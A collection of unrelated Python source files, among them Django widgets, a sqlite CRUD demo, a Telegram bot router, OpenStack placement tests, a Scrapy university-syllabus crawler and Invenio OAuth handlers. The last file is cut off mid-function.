from django.conf import settings
from django.forms import Textarea
from django_filters.widgets import RangeWidget
from django_prices.widgets import MoneyInput
from ..account.widgets import PhonePrefixWidget as StorefrontPhonePrefixWidget
class DateRangeWidget(RangeWidget):
def __init__(self, attrs=None):
widgets = (forms.DateInput, forms.DateInput)
# pylint: disable=bad-super-call
super(RangeWidget, self).__init__(widgets, attrs)
class MoneyRangeWidget(RangeWidget):
def __init__(self, attrs=None):
self.currency = getattr(settings, 'DEFAULT_CURRENCY')
widgets = (MoneyInput(self.currency), MoneyInput(self.currency))
# pylint: disable=bad-super-call
super(RangeWidget, self).__init__(widgets, attrs)
class PhonePrefixWidget(StorefrontPhonePrefixWidget):
template_name = 'dashboard/order/widget/phone_prefix_widget.html'
class RichTextEditorWidget(Textarea):
"""A WYSIWYG editor widget using medium-editor."""
def __init__(self, attrs=None):
default_attrs = {'class': 'rich-text-editor'}
if attrs:
default_attrs.update(attrs)
super().__init__(default_attrs)
|
# Source
SOURCE_TYPE_NAME = 'mongodb'
# Service check
SERVICE_CHECK_NAME = 'mongodb.can_connect'
# Replication states
"""
MongoDB replica set states, as documented at
https://docs.mongodb.org/manual/reference/replica-states/
"""
REPLSET_MEMBER_STATES = {
0: ('STARTUP', 'Starting Up'),
1: ('PRIMARY', 'Primary'),
2: ('SECONDARY', 'Secondary'),
3: ('RECOVERING', 'Recovering'),
4: ('Fatal', 'Fatal'), # MongoDB docs don't list this state
5: ('STARTUP2', 'Starting up (forking threads)'),
6: ('UNKNOWN', 'Unknown to this replset member'),
7: ('ARBITER', 'Arbiter'),
8: ('DOWN', 'Down'),
9: ('ROLLBACK', 'Rollback'),
10: ('REMOVED', 'Removed'),
}
DEFAULT_TIMEOUT = 30
ALLOWED_CUSTOM_METRICS_TYPES = ['gauge', 'rate', 'count', 'monotonic_count']
ALLOWED_CUSTOM_QUERIES_COMMANDS = ['aggregate', 'count', 'find']
def get_state_name(state):
"""Maps a mongod node state id to a human readable string."""
if state in REPLSET_MEMBER_STATES:
return REPLSET_MEMBER_STATES[state][0]
else:
return 'UNKNOWN'
class Deployment(object):
def get_available_metrics(self):
# TODO: Use this method to know what metrics to collect based on the deployment type.
raise NotImplementedError
class MongosDeployment(Deployment):
def get_available_metrics(self):
return None
class ReplicaSetDeployment(Deployment):
def __init__(self, replset_name, replset_state):
self.replset_name = replset_name
self.replset_state = replset_state
self.replset_state_name = get_state_name(replset_state).lower()
def get_available_metrics(self):
return None
class StandaloneDeployment(Deployment):
def get_available_metrics(self):
return None
|
from abc import ABCMeta, abstractmethod, abstractproperty
from spells import TohsakaException
class BaseSpell(metaclass=ABCMeta):
def __init__(self, config):
if not self._validate_config(config):
raise TohsakaException(f'Invalid options. Expected [{", ".join(self.REQUIRED_OPTIONS)}] Actual [{", ".join(config.keys())}]')
self.config = config
def _validate_config(self, options):
if not isinstance(self.REQUIRED_OPTIONS, list):
raise TohsakaException(f'Invalid REQUIRED_OPTIONS. Expected list Actual {type(self.REQUIRED_OPTIONS)}')
return all(key in options for key in self.REQUIRED_OPTIONS)
@abstractproperty
def REQUIRED_OPTIONS(self):
raise NotImplementedError
@classmethod
@abstractmethod
def name(self):
raise NotImplementedError
@classmethod
@abstractmethod
def intro(self):
raise NotImplementedError
|
#
# This is the tnetstring setuptools script.
# Originally developed by Ryan Kelly, 2011.
#
# This script is placed in the public domain.
# If there's no public domain where you come from,
# you can use it under the MIT license.
#
import sys
setup_kwds = {}
if sys.version_info > (3,):
from setuptools import setup, Extension
setup_kwds["test_suite"] = "tnetstring.test"
setup_kwds["use_2to3"] = True
else:
from distutils.core import setup, Extension
try:
next = next
except NameError:
def next(i):
return i.next()
info = {}
try:
src = open("tnetstring/__init__.py")
lines = []
ln = next(src)
while "__version__" not in ln:
lines.append(ln)
ln = next(src)
while "__version__" in ln:
lines.append(ln)
ln = next(src)
exec("".join(lines),info)
except Exception:
pass
NAME = "tnetstring"
VERSION = info["__version__"]
DESCRIPTION = "data serialization using typed netstrings"
LONG_DESC = info["__doc__"]
AUTHOR = "Ryan Kelly"
AUTHOR_EMAIL = "ryan@rfk.id.au"
URL="http://github.com/rfk/tnetstring"
LICENSE = "MIT"
KEYWORDS = "netstring serialize"
CLASSIFIERS = [
"Programming Language :: Python",
"Programming Language :: Python :: 2",
#"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License"
]
setup(name=NAME,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
description=DESCRIPTION,
long_description=LONG_DESC,
license=LICENSE,
keywords=KEYWORDS,
packages=["tnetstring","tnetstring.tests"],
ext_modules = [
Extension(name="_tnetstring",sources=["tnetstring/_tnetstring.c"]),
],
classifiers=CLASSIFIERS,
**setup_kwds
)
|
import os
from AnalysisModule.calculator.descriptors import MolecularDC
from AnalysisModule.routines.data_settings import SDPATH
from AnalysisModule.routines.util import save_pkl, load_pkl
import pandas as pd
smis = [
"NC1CCNCC1",
"CN(C)C(C)(C)CCN",
"CCCCCCCCN1CCNCC1",
"NCC1CCC(CN)CC1",
]
mdc = MolecularDC(smis)
df1 = mdc.cal_RdkitFrag(smis)
df2 = mdc.cal_Jchem2D(smis)
df3 = mdc.cal_Mordred2D(smis)
df = pd.concat([df1, df2, df3], axis=1)
original_amine_table = load_pkl("AmineTable.pkl")
original_amine_table_fields = list(list(original_amine_table.values())[0].keys())
df = df[[c for c in df.columns if c in original_amine_table_fields]]
print(len(df.columns))
print(len(original_amine_table_fields))
print(set(original_amine_table_fields).difference(set(df.columns)))
df["smiles"] = smis
mdes_df = df.set_index("smiles")
mdes_df = mdes_df.dropna(axis=1, how='any')
amine2mdes = mdes_df.to_dict("index")
save_pkl(amine2mdes, "extra_amine_table.pkl")
|
import sqlite3
from consola import Consola
from video_juego import VideoJuego
conexion = sqlite3.connect("gamer_db.db")
cursor = conexion.cursor()
cursor.execute("""
CREATE TABLE IF NOT EXISTS consolas
(
id_consola INTEGER PRIMARY KEY NOT NULL,
nombre_consola TEXT,
precio_consola INTEGER
)
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS video_juegos
(
id_videojuego INTEGER PRIMARY KEY NOT NULL,
nombre_videojuego TEXT,
precio_videojuego INTEGER
)
""")
def insertar_consolas(consola):
with conexion:
cursor.execute("INSERT INTO consolas VALUES(:id_consola, :nombre_consola, :precio_consola)", {'id_consola': consola.id_consola, 'nombre_consola': consola.nombre_consola, 'precio_consola': consola.precio_consola})
print("Se agregó la consola")
def insertar_juegos(juego):
with conexion:
cursor.execute("INSERT INTO video_juegos VALUES(:id_videojuego, :nombre_videojuego, :precio_videojuego)", {'id_videojuego': juego.id_videojuego, 'nombre_videojuego': juego.nombre_videojuego, 'precio_videojuego': juego.precio_videojuego})
print("Se agregó el video juego")
def consultar_consolas():
cursor.execute("SELECT * FROM consolas")
return cursor.fetchall()
def consultar_juegos():
cursor.execute("SELECT * FROM video_juegos")
return cursor.fetchall()
def modificar_consolas(consola, precio_consola):
with conexion:
cursor.execute("UPDATE consolas SET precio_consola = :precio_consola WHERE id_consola = :id_consola", {'precio_consola': precio_consola, 'id_consola': consola.id_consola})
print("Se actualizó el precio de la consola:", consola.nombre_consola)
def modificar_juegos(juego, precio_videojuego):
with conexion:
cursor.execute("UPDATE video_juegos SET precio_videojuego = :precio_videojuego WHERE id_videojuego = :id_videojuego", {'precio_videojuego': precio_videojuego, 'id_videojuego': juego.id_videojuego})
print("Se actualizó el precio del video juego:", juego.nombre_videojuego)
def eliminar_consolas(consola):
with conexion:
cursor.execute("DELETE FROM consolas WHERE id_consola = :id_consola", {'id_consola': consola.id_consola})
print("Se eliminó la consola:", consola.nombre_consola)
def eliminar_juegos(juego):
with conexion:
cursor.execute("DELETE FROM video_juegos WHERE id_videojuego = :id_videojuego", {'id_videojuego': juego.id_videojuego})
print("Se eliminó el video juego:", juego.nombre_videojuego)
#----------------------------------------------------------------------------#
cons_1 = Consola(1, 'xbox', 5000)
cons_2 = Consola(2, 'ps', 5200)
insertar_consolas(cons_1)
insertar_consolas(cons_2)
cns_consola = consultar_consolas()
print(cns_consola)
modificar_consolas(cons_1, 5100)
eliminar_consolas(cons_2)
#----------------------------------------------------------------------------#
#----------------------------------------------------------------------------#
game_1 = VideoJuego(1, 'fifa', 800)
game_2 = VideoJuego(2, 'The King of Fighters', 1400)
insertar_juegos(game_1)
insertar_juegos(game_2)
cns_juego = consultar_juegos()
print(cns_juego)
modificar_juegos(game_2, 700)
eliminar_juegos(game_1)
#----------------------------------------------------------------------------#
conexion.close() |
"""
Fire API Response Metadata
"""
# Standard Library
import datetime
from typing import Any, Dict
# Third Party Code
from dateutil.parser import parse
# Supercell Code
from supercell.breezometer.models.base import BreezoMeterModel
class FiresAPIResponseMetadata(BreezoMeterModel):
"""Fires API Response Metadata Model"""
timestamp: datetime.datetime
location: Dict[str, str]
def __init__(self, timestamp: datetime.datetime, location: Dict[str, str],) -> None:
self.location = location
super().__init__(timestamp=timestamp)
def to_str(self) -> str:
return "{class_name} [{timestamp}]: location={location}".format(
location=self.location,
timestamp=self.timestamp.isoformat(),
class_name=self.__class__.__name__,
)
@classmethod
def initialize_from_dictionary(cls, response_dictionary: Dict[str, Any]):
return cls(
timestamp=parse(response_dictionary["timestamp"]),
location=response_dictionary["location"],
)
|
#!/usr/bin/env python
import sys, os, re
import argparse
def main():
parser = argparse.ArgumentParser(description="splits sample sheets and generates STAR-Fusion commands",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--sample_sheet", required=True, help="sample sheet")
parser.add_argument("--cells_per_job", required=False, type=int, default=24, help="number of cells per run")
parser.add_argument("--output_dir", required=True, type=str, help="output directory")
args = parser.parse_args()
sample_sheet = args.sample_sheet
cells_per_job = args.cells_per_job
output_dir = args.output_dir
output_dir = os.path.abspath(output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
batch_files = list()
batch_num = 0
sample_counter = 0
ofh = None
with open(sample_sheet, 'rt') as fh:
for line in fh:
line = line.rstrip()
if sample_counter % cells_per_job == 0: # should always trigger on first entry
if ofh:
ofh.close
batch_num += 1
batch_file = os.path.join(output_dir, "batch.{}.sample_sheet".format(batch_num))
ofh = open(batch_file, 'wt')
batch_files.append(batch_file)
print(line, file=ofh)
sample_counter += 1
ofh.close
# write sample sheet listing.
batches_list_file = output_dir + ".batches.list"
with open(batches_list_file, 'wt') as ofh:
ofh.write("\n".join(batch_files) + "\n")
sys.exit(0)
if __name__=='__main__':
main()
|
import re
from typing import List
import telegram as tg
import telegram.ext as tg_ext
from ..models import DocumentLink, User
from ..state_managing.statemanager import StateManager
from ..state_managing.exceptions.stateerror import StateError
from ..role_managing.roleauth import RoleAuth
from ..role_managing.exceptions.roleerror import RoleError
from .routes import CommandRoute, DocumentRoute, ImageRoute, MessageRoute
class Router:
"""
Class managing income messages callbacks
..........
Attributes
----------
command_routes: List[CommandRoute], private
list of commands routes (commands start with /)
document_routes: List[DocumentRoute], private
list of document routes
image_routes: List[MessageRoute], private
list of image (photo) routes
message_routes: List[MessageRoute], private
list of text message routes
tg: telegram.ext.Dispatcher, private
`python-telegram-bot` class, dispatching all kinds of updates
state_manager: StateManager, private
class managing user states
role_auth: RoleAuth, private
class managing user roles
.......
Methods
-------
register_command_route(): public
registers given command handler
register_document_route(): public
registers given document handler
register_image_route(): public
registers given image handler
register_message_route(): public
registers given message handler
find_command_routes(): private
finds all command routes that are accessible with user state and roles and triggered with command
find_document_routes(): private
finds all documents routes that are accessible with user state and roles and triggered with document
find_image_routes(): private
finds all image routes that are accessible with user state and roles and triggered with image
find_message_routes(): private
finds all message routes that are accessible with user state and roles and triggered with message
serve_command_route(): private
handler for all registered commands, distributes callback functions to received commands
serve_document_route(): private
handler for all registered documents, distributes callback functions to received documents
serve_image_route(): private
handler for all registered images, distributes callback functions to received images
serve_message_route(): private
handler for all registered messages, distributes callback functions to received messages
"""
def __init__(self,
tg_dispatcher: tg_ext.Dispatcher,
state_manager: StateManager,
role_auth: RoleAuth) -> None:
"""
Constructor.
.........
Arguments
---------
tg_dispatcher: telegram.ext.Dispatcher, required
`python-telegram-bot` class, dispatching all kinds of updates
state_manager: StateManager, required
state system
role_auth: RoleAuth, required
role/authorization system
"""
self.__message_routes: List[MessageRoute] = []
self.__command_routes: List[CommandRoute] = []
self.__doсument_routes: List[DocumentRoute] = []
self.__image_routes: List[ImageRoute] = []
self.__tg = tg_dispatcher
self.__state_manager = state_manager
self.__role_auth = role_auth
def __find_command_routes(self,
command: str,
state: str,
roles: List[str]) -> List[CommandRoute]:
"""
Finds all command routes that are accessible with user state and roles
and triggered with command
.........
Arguments
---------
command: str, requited
trigger command to serve the route
state: str, required
user state for access to serving the route
roles: List[str], required
user roles for access to serving the route
"""
found_routes = []
for command_route in self.__command_routes:
if command == command_route.command and\
command_route.is_accessible_with(state, roles):
found_routes.append(command_route)
return found_routes
def __find_document_routes(self,
file_name: str,
mime_type: str,
state: str,
roles: List[str]) -> List[DocumentRoute]:
"""
Finds all document routes that are accessible with user state and roles
and triggered by a document with given name and MIME-type
.........
Arguments
---------
file_name: str, requited
trigger document file name to serve the route
mime_type: str, requited
trigger document MIME-type to serve the route
state: str, required
user state for access to serving the route
roles: List[str], required
user roles for access to serving the route
"""
found_routes = []
for route in self.__doсument_routes:
if route.file_names and not file_name in route.file_names:
continue
if route.mime_types and not mime_type in route.mime_types:
continue
if not route.is_accessible_with(state, roles):
continue
found_routes.append(route)
return found_routes
def __find_image_routes(self,
state: str,
roles: List[str]) -> List[ImageRoute]:
"""
Finds all image routes that are accessible with user state and roles
and triggered by an image
.........
Arguments
---------
state: str, required
user state for access to serving the route
roles: List[str], required
user roles for access to serving the route
"""
found_routes = []
for route in self.__image_routes:
if not route.is_accessible_with(state, roles):
continue
found_routes.append(route)
return found_routes
def __find_message_routes(self,
message: str,
state: str,
roles: List[str]) -> List[MessageRoute]:
"""
Finds all message routes that are accessible with user state and roles and triggered with message
.........
Arguments
---------
message: str, requited
trigger regex message text to serve the route
state: str, required
user state for access to serving the route
roles: List[str], required
user roles for access to serving the route
"""
found_routes = []
for message_route in self.__message_routes:
if re.fullmatch(message_route.message, message) and\
message_route.is_accessible_with(state, roles):
found_routes.append(message_route)
return found_routes
def __serve_command_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
"""
Handler for all registered commands, distributes callback functions to received commands.
command is considered to start with '/' and end with end of string or space.
Calls callback function with **kwargs:
user: User
user who has sent a command
message: str
full received message text
.........
Arguments
---------
update: telegram.Update, required
`python-telegram-bot` class, representing an incoming update
context: telegram.ext.CallbackContext, required
`python-telegram-bot` class. context passed by telegram handler to callback
"""
message = update.message
text = message.text
command = text.split()[0].strip('/')
user = User(message.chat)
try: # try-except for user start initialization when he is not in db
user.state = self.__state_manager.get_state(user.id)
user.roles = self.__role_auth.get_user_roles(user.id)
except (StateError, RoleError):
user.state = 'free'
user.roles = ['user']
found_routes = self.__find_command_routes(command, user.state, user.roles)
for route in found_routes:
route.callback(user=user,
message=text)
def __serve_document_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
"""
Handler for all registered documents, distributes callback functions to received documents.
Calls callback function with **kwargs:
user: User
user who has sent a document
message: str
full received message text
document: DocumentLink
link to received document
.........
Arguments
---------
update: telegram.Update, required
`python-telegram-bot` class, representing an incoming update
context: telegram.ext.CallbackContext, required
`python-telegram-bot` class. context passed by telegram handler to callback
"""
message: tg.Message = update.message
text = message.text
user = User(message.chat)
try: # try-except for user start initialization when he is not in db
user.state = self.__state_manager.get_state(user.id)
user.roles = self.__role_auth.get_user_roles(user.id)
except (StateError, RoleError):
user.state = 'free'
user.roles = ['user']
document_link = DocumentLink(tg_document=message.document,
media_group_id=message.media_group_id)
found_routes = self.__find_document_routes(document_link.name,
document_link.mime_type,
user.state, user.roles)
for route in found_routes:
route.callback(user=user,
message=text,
document=document_link)
def __serve_image_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
"""
Handler for all registered images, distributes callback functions to received images.
Calls callback function with **kwargs:
user: User
user who has sent an image
message: str
full received message text
images: List[DocumentLink]
links to received images
.........
Arguments
---------
update: telegram.Update, required
`python-telegram-bot` class, representing an incoming update
context: telegram.ext.CallbackContext, required
`python-telegram-bot` class. context passed by telegram handler to callback
"""
message: tg.Message = update.message
text = message.text
user = User(message.chat)
try: # try-except for user start initialization when he is not in db
user.state = self.__state_manager.get_state(user.id)
user.roles = self.__role_auth.get_user_roles(user.id)
except (StateError, RoleError):
user.state = 'free'
user.roles = ['user']
image_ids = message.photo
images = [DocumentLink(image_id.get_file(), message.media_group_id) \
for image_id in image_ids]
found_routes = self.__find_image_routes(user.state, user.roles)
for route in found_routes:
route.callback(user=user,
message=text,
images=images)
def __serve_message_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
"""
Handler for all registered text messages, distributes callback functions to received messages.
Calls callback function with **kwargs:
user: User
user who has sent a message
message: str
full received message text
.........
Arguments
---------
update: telegram.Update, required
`python-telegram-bot` class, representing an incoming update
context: telegram.ext.CallbackContext, required
`python-telegram-bot` class. context passed by telegram handler to callback
"""
message = update.message
text = message.text
user = User(message.chat)
try: # try-except for user start initialization when he is not in db
user.state = self.__state_manager.get_state(user.id)
user.roles = self.__role_auth.get_user_roles(user.id)
except (StateError, RoleError):
user.state = 'free'
user.roles = ['user']
found_routes = self.__find_message_routes(text, user.state, user.roles)
for route in found_routes:
route.callback(user=user,
message=text)
def register_command_route(self, route: CommandRoute) -> None:
"""
Registers given command handler.
.........
Arguments
---------
route: CommandRoute, required
route to register
"""
self.__command_routes.append(route)
self.__tg.add_handler(tg_ext.CommandHandler(command=route.command,
callback=self.__serve_command_route))
def register_document_route(self, route: DocumentRoute) -> None:
"""
Registers given document handler.
.........
Arguments
---------
route: DocumentRoute, required
route to register
"""
self.__doсument_routes.append(route)
self.__tg.add_handler(tg_ext.MessageHandler(filters=tg_ext.Filters.document,
callback=self.__serve_document_route))
def register_image_route(self, route: ImageRoute) -> None:
"""
Registers given image handler.
.........
Arguments
---------
route: ImageRoute, required
route to register
"""
self.__image_routes.append(route)
self.__tg.add_handler(tg_ext.MessageHandler(filters=tg_ext.Filters.photo,
callback=self.__serve_image_route))
def register_message_route(self, route: MessageRoute) -> None:
"""
Registers given text message handler.
.........
Arguments
---------
route: MessageRoute, required
route to register
"""
self.__message_routes.append(route)
self.__tg.add_handler(tg_ext.MessageHandler(filters=tg_ext.Filters.regex(route.message),
callback=self.__serve_message_route))
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import operator
import uuid
import six
from osc_placement.tests.functional import base
class TestUsage(base.BaseTestCase):
def test_usage_show(self):
consumer_uuid = str(uuid.uuid4())
rp = self.resource_provider_create()
self.resource_inventory_set(
rp['uuid'],
'VCPU=4',
'VCPU:max_unit=4',
'MEMORY_MB=1024',
'MEMORY_MB:max_unit=1024')
self.assertEqual([{'resource_class': 'MEMORY_MB', 'usage': 0},
{'resource_class': 'VCPU', 'usage': 0}],
sorted(self.resource_provider_show_usage(rp['uuid']),
key=operator.itemgetter('resource_class')))
self.resource_allocation_set(
consumer_uuid,
['rp={},VCPU=2'.format(rp['uuid']),
'rp={},MEMORY_MB=512'.format(rp['uuid'])]
)
self.assertEqual([{'resource_class': 'MEMORY_MB', 'usage': 512},
{'resource_class': 'VCPU', 'usage': 2}],
sorted(self.resource_provider_show_usage(rp['uuid']),
key=operator.itemgetter('resource_class')))
def test_usage_not_found(self):
rp_uuid = str(uuid.uuid4())
exc = self.assertRaises(base.CommandException,
self.resource_provider_show_usage,
rp_uuid)
self.assertIn(
'No resource provider with uuid {} found'.format(rp_uuid),
six.text_type(exc)
)
def test_usage_empty(self):
rp = self.resource_provider_create()
self.assertEqual([], self.resource_provider_show_usage(rp['uuid']))
class TestResourceUsage(base.BaseTestCase):
VERSION = '1.9'
def test_usage_by_project_id_user_id(self):
c1 = str(uuid.uuid4())
c2 = str(uuid.uuid4())
c3 = str(uuid.uuid4())
p1 = str(uuid.uuid4())
p2 = str(uuid.uuid4())
u1 = str(uuid.uuid4())
u2 = str(uuid.uuid4())
rp = self.resource_provider_create()
self.resource_inventory_set(rp['uuid'], 'VCPU=16')
self.resource_allocation_set(
c1, ['rp={},VCPU=2'.format(rp['uuid'])], project_id=p1, user_id=u1)
self.resource_allocation_set(
c2, ['rp={},VCPU=4'.format(rp['uuid'])], project_id=p2, user_id=u1)
self.resource_allocation_set(
c3, ['rp={},VCPU=6'.format(rp['uuid'])], project_id=p1, user_id=u2)
# Show usage on the resource provider for all consumers.
self.assertEqual(
12, self.resource_provider_show_usage(uuid=rp['uuid'])[0]['usage'])
# Show usage for project p1.
self.assertEqual(
8, self.resource_show_usage(project_id=p1)[0]['usage'])
# Show usage for project p1 and user u1.
self.assertEqual(
2, self.resource_show_usage(
project_id=p1, user_id=u1)[0]['usage'])
# Show usage for project p2.
self.assertEqual(
4, self.resource_show_usage(project_id=p2)[0]['usage'])
|
from abc import ABC
from pathlib import Path
import scrapy
from settings import YEAR, CRAWLING_OUTPUT_FOLDER
import json
import logging
log = logging.getLogger()
BASE_URL = 'https://qsl.cds.tohoku.ac.jp/qsl/'
CYCLE_MAP = { 'b': ('学士', 'bac'), 'm': ('修士', 'master'), 'd': ('博士', 'doctor') }
# Note: need to change the parameter ROBOTS_OBEY in the crawler settings.py to make the crawler work
class TohokuUnivProgramSpider(scrapy.Spider, ABC):
"""
Programs crawler for Tohoku University
"""
name = "tohoku-programs"
custom_settings = {
'FEED_URI': Path(__file__).parent.absolute().joinpath(
f'../../../../{CRAWLING_OUTPUT_FOLDER}tohoku_programs_{YEAR}.json').as_uri()
}
def start_requests(self):
yield scrapy.Request(BASE_URL, self.parse_main)
def parse_main(self, response):
faculties = response.xpath("//h4/text()").getall()
log.info(faculties)
self.courses_ids = {}
for faculty in faculties:
faculty_name = faculty.split('・')[0] if '・' in faculty else faculty
program_link = response.xpath(
f"//h4[text()='{faculty}']/following::div[1]//a/@href").get()
program_id = program_link.split("type=")[1]
self.courses_ids[program_id] = []
search_url = f"/qsl/syllabus/search_more?skip=0&type={program_id}&query_string="
yield response.follow(
search_url, callback=self.parse_program,
cb_kwargs={"faculty_name": faculty_name, "program_id": program_id})
def parse_program(self, response, faculty_name, program_id):
data = json.loads(response.body)
syllabus_data = data["syllabus_data"]
courses_ids = [s["_source"]["page"] for s in syllabus_data]
self.courses_ids[program_id] += courses_ids
if len(syllabus_data) == 0:
courses_ids = list(set(self.courses_ids[program_id]))
for cycle in list(CYCLE_MAP.keys()):
cycle_courses_ids = [c for c in courses_ids if c[1] == cycle]
if len(cycle_courses_ids) == 0:
continue
yield {
"id": '_'.join([cycle, program_id]),
"name": f"{faculty_name}({CYCLE_MAP[cycle][0]})",
"cycle": CYCLE_MAP[cycle][1],
"faculties": [faculty_name],
"campuses": [], # didn't find information on campuses
"url": f"{BASE_URL}syllabus/find?type={program_id}",
"courses": cycle_courses_ids,
"ects": [] # ECTS not applicable in Japan
}
return
n_limit = data["n_limit"]
skip = data["skip"]
search_url = response.url.replace(f"skip={skip}", f"skip={skip + n_limit}")
yield response.follow(
search_url, callback=self.parse_program,
cb_kwargs={"faculty_name": faculty_name, "program_id": program_id})
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, TextAreaField
# from wtforms.validators import Required, Email, EqualTo
from ..models import User
from wtforms import ValidationError
from wtforms import StringField, PasswordField, BooleanField, SubmitField
class UpdateProfile(FlaskForm):
username = TextAreaField('enter username')
submit = SubmitField('Submit')
class BlogForm(FlaskForm):
title = TextAreaField('enter title')
content = TextAreaField('type your blog')
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
content = TextAreaField('comment')
submit = SubmitField('Submit')
|
COL_DATA_FRAME = 0
COL_DATA_FRAME_LEN = 1
COL_DATA_FRAME_CRC = 2
def getDataFrame1():
fLen = 0x05
dCRC = 0xAB
data = bytearray()
data.append(0x02)
data.append(0x3C)
data.append(fLen)
data.append(0x10)
data.append(0x10)
data.append(0x03)
data.append(0x01)
data.append(dCRC)
return (data, fLen, dCRC)
def getDataFrame_ERR_Header():
fLen = 0x05
dCRC = 0xAB
data = bytearray()
data.append(0x02)
data.append(0x32)
data.append(fLen)
data.append(0x10)
data.append(0x10)
data.append(0x03)
data.append(0x01)
data.append(dCRC)
return (data, fLen, dCRC)
def getDataFrame_ERR_CRC():
fLen = 0x05
dCRC = 0x03
data = bytearray()
data.append(0x02)
data.append(0x3C)
data.append(fLen)
data.append(0x10)
data.append(0x10)
data.append(0x03)
data.append(0x01)
data.append(dCRC)
return (data, fLen, dCRC)
def getDataFrame_ERR_LEN():
fLen = 0x09
dCRC = 0xAB
data = bytearray()
data.append(0x02)
data.append(0x3C)
data.append(fLen)
data.append(0x10)
data.append(0x10)
data.append(0x03)
data.append(0x01)
data.append(dCRC)
return (data, fLen, dCRC)
def getDataFrame_ERR_LEN_Diff():
fLen = 0x05
dCRC = 0xAB
data = bytearray()
data.append(0x02)
data.append(0x3C)
data.append(fLen)
data.append(0x10)
data.append(0x10)
data.append(0x03)
data.append(0x01)
data.append(0x20)
data.append(0x55)
data.append(0x9C)
data.append(dCRC)
return (data, fLen, dCRC) |
# Copyright 2019 Autodesk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: figure out what's missing from the build. CMake based builds work
# without this.
# We are forcing the creation of wrappers.
from pxr import Usd, UsdGeom, UsdShade, UsdLux
import _usdArnold
del Usd, UsdGeom, UsdShade, UsdLux
from pxr import Tf
Tf.PrepareModule(_usdArnold, locals())
del Tf
try:
import __DOC
__DOC.Execute(locals())
del __DOC
except Exception:
try:
import __tmpDoc
__tmpDoc.Execute(locals())
del __tmpDoc
except:
pass |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Handlers for customizing oauthclient endpoints."""
from __future__ import absolute_import, print_function
from functools import partial, wraps
import six
from flask import current_app, flash, redirect, render_template, request, \
session, url_for
from flask_babelex import gettext as _
from flask_login import current_user
from invenio_db import db
from werkzeug.utils import import_string
from ..errors import AlreadyLinkedError, OAuthClientError, OAuthError, \
OAuthRejectedRequestError, OAuthResponseError, \
OAuthClientAlreadyAuthorized, OAuthClientUnAuthorized, \
OAuthClientTokenNotSet, OAuthClientUserNotRegistered, \
OAuthClientTokenNotFound, OAuthClientMustRedirectLogin, \
OAuthClientMustRedirectSignup
from ..models import RemoteAccount, RemoteToken
from ..proxies import current_oauthclient
from ..signals import account_info_received, account_setup_committed, \
account_setup_received
from ..utils import create_csrf_disabled_registrationform, \
create_registrationform, fill_form, oauth_authenticate, oauth_get_user, \
oauth_register
from .utils import get_session_next_url, response_token_setter, token_getter, \
token_session_key, token_setter
from .base import (
base_authorized_signup_handler,
base_disconnect_handler,
base_signup_handler
)
def _oauth_error_handler(remote, f, *args, **kwargs):
"""Function to handle exceptions."""
try:
return f(remote, *args, **kwargs)
except OAuthClientError as e:
current_app.logger.warning(e.message, exc_info=True)
return oauth2_handle_error(
e.remote, e.response, e.code, e.uri, e.description
)
except OAuthClientUnAuthorized:
return current_app.login_manager.unauthorized()
except AlreadyLinkedError:
flash(
_('External service is already linked to another account.'),
category='danger')
return redirect(url_for('invenio_oauthclient_settings.index'))
except OAuthRejectedRequestError:
flash(
_('You rejected the authentication request.'),
category='info')
return redirect('/')
except OAuthClientAlreadyAuthorized:
return redirect('/')
except OAuthClientTokenNotFound:
return redirect('/')
except OAuthClientUserNotRegistered:
raise OAuthError('Could not create user.', remote)
except OAuthClientTokenNotSet:
raise OAuthError('Could not create token for user.', remote)
except OAuthClientMustRedirectSignup as e:
return redirect(url_for('.signup', remote_app=remote.name,))
except OAuthClientMustRedirectLogin as e:
return redirect(url_for('.login', remote_app=remote.name,))
#
# Error handling decorators
#
def oauth_resp_remote_error_handler(f):
"""Decorator to handle exceptions."""
@wraps(f)
def inner(resp, remote, *args, **kwargs):
# OAuthErrors should not happen, so they are not caught here. Hence
# they will result in a 500 Internal Server Error which is what we
# are interested in.
_f = partial(f, resp)
return _oauth_error_handler(remote, _f, *args, **kwargs)
return inner
def oauth_remote_error_handler(f):
"""Decorator to handle exceptions."""
@wraps(f)
def inner(remote, *args, **kwargs):
# OAuthErrors should not happen, so they are not caught here. Hence
# they will result in a 500 Internal Server Error which is what we
# are interested in.
return _oauth_error_handler(remote, f, *args, **kwargs)
return inner
#
# Handlers
#
@oauth_resp_remote_error_handler
def authorized_default_handler(resp, remote, *args, **kwargs):
"""Store access token in session.
Default authorized handler.
:param remote: The remote application.
:param resp: The response.
:returns: Redirect response.
"""
response_token_setter(remote, resp)
db.session.commit()
return redirect(url_for('invenio_oauthclient_settings.index'))
@oauth_resp_remote_error_handler
def authorized_signup_handler(resp, remote, *args, **kwargs):
"""Handle sign-in/up functionality.
:param remote: The remote application.
:param resp: The response.
:returns: Redirect response.
"""
